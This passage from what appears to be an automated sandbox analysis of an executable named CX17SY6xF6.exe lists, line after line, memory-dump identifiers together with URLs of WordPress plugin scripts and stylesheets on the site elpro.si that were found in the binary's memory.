00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/custom.js?ver=1.6
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/imagesloaded.pkgd
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/js/jquery.qtip.js?ve
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/css/style.php?cssvars=bXRsaV9oZWlnaHQ9MT
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/mimetypes-link-icons/js/mtli-str-replace.min.js?ver=3.1.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/css/style.css?ver=3
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 